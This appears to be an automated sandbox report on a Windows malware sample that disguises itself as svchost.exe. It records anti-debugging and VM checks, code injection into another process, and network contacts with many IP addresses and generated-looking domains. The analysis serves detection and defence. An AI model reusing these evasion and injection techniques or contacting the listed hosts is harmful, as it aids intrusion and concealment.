    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02557680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_02557680
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0256E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0256E6B0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025EDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,8_2_025EDA50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025EDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,8_2_025EDAE8
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025E9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,8_2_025E9910
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025DD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_025DD120
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025C7680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,8_2_025C7680
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025DE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_025DE6B0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CBE0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,1_2_02CBE0FB
    Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: 5AFlyarMds.exe, 00000000.00000002.1740521806.000000000068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pindows\system\vmhgfs.DLLrM
    Source: 5AFlyarMds.exe, 00000000.00000002.1740521806.000000000068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: irs\user\Desktop\vmhgfs.l
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2501299413.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793808269.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574096603.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636466156.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1771501878.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2629381703.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2709512878.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2784321993.0000000000891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: svchost.exe, 00000001.00000002.2973986675.000000000082D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(t
    Source: svchost.exe, 00000001.00000002.2974475260.0000000000885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP UDP Service Provider
    Source: C:\Windows\apppatch\svchost.exeAPI call chain: ExitProcess graph end nodegraph_1-65375
    Source: C:\Windows\apppatch\svchost.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F779D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_02F779D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,1_2_02CA78A0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]0_2_00406800
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]0_2_00406B60
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]0_2_00406B60
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00406800 mov eax, dword ptr fs:[00000030h]1_2_00406800
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00406B60 mov eax, dword ptr fs:[00000030h]1_2_00406B60
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00406B60 mov edx, dword ptr fs:[00000030h]1_2_00406B60
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029B1360 mov eax, dword ptr fs:[00000030h]1_2_029B1360
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029B1360 mov edx, dword ptr fs:[00000030h]1_2_029B1360
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029B1000 mov eax, dword ptr fs:[00000030h]1_2_029B1000
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_015E1360 mov eax, dword ptr fs:[00000030h]5_2_015E1360
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_015E1360 mov edx, dword ptr fs:[00000030h]5_2_015E1360
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_015E1000 mov eax, dword ptr fs:[00000030h]5_2_015E1000
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_023F1360 mov eax, dword ptr fs:[00000030h]6_2_023F1360
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_023F1360 mov edx, dword ptr fs:[00000030h]6_2_023F1360
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_023F1000 mov eax, dword ptr fs:[00000030h]6_2_023F1000
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02521360 mov eax, dword ptr fs:[00000030h]8_2_02521360
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02521360 mov edx, dword ptr fs:[00000030h]8_2_02521360
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02521000 mov eax, dword ptr fs:[00000030h]8_2_02521000
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00401150 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,SetFilePointer,LockFile,ReadFile,UnlockFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,FindCloseChangeNotification,IsBadWritePtr,0_2_00401150

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 15.197.240.20 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.108 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: gacyqys.com
    Source: C:\Windows\apppatch\svchost.exeDomain query: gatyzys.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: vojypat.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 47.103.150.18 8001Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.91.196.145 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: vonycum.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 69.162.80.62 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 23.253.46.64 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: lymyjix.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: vocydyc.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.226 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.11.230 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.64.163.50 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: volycik.com
    Source: C:\Windows\apppatch\svchost.exeDomain query: qekynyv.com
    Source: C:\Windows\apppatch\svchost.exeDomain query: volydyk.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: gaqyqez.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 178.162.203.226 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: lysyvud.com
    Source: C:\Windows\apppatch\svchost.exeDomain query: lymymud.com
    Allocates memory in foreign processes
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 15E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2520000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E40000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2480000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2540000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22D0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E40000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 890000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2CC0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: FE0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3150000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2060000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D30000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1270000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2340000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1200000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EF0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24A0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3080000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FA0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: D00000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2740000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 740000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2550000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EC0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 800000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2610000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1060000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1010000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 13F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BF0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2390000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2260000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2950000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2860000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2710000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 900000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25E0000 protect: page execute and read and writeJump to behavior
